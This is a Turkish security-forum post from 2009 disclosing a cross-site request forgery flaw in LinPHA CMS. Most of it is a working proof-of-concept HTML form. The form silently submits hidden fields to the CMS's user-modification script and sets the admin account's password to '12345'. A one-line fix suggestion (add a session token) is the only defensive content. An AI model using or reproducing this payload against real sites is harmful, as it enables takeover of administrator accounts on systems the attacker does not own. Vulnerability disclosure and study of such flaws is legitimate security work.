LinPHA ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > LinPHA ~ XSRF Vuln.

Madde
	Author : Bug Researchers/_iLLeqaL_
	Date : 13.09.2009 20:48:09
	# LinPHA ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : LinPHA CMS # vulnerable Type : XSRF # Infection : Yeni Admin eklenebilir # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! # author : _iLLeqaL_ ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form name=mod_user method=POST action=http://[site].com/[yol]/actions/submit_mod_data.php> <input type=hidden name=mod_user_name size=10 maxlength=25 value=admin> <input type=hidden name=mod_user_fullname size=15 maxlength=50 value=> <input type=hidden name=mod_user_pass size=10 maxlength=25 AUTOCOMPLETE=OFF value=12345> <input type=hidden name=mod_user_mail size=15 maxlength=45 value=mail@mail.com> <input type=hidden name=id value=1> <input type=hidden name=old_user_name value=admin> <input type=hidden name=action value=user> <input type=submit value=Tamam> </form> < -- bug code end of -- >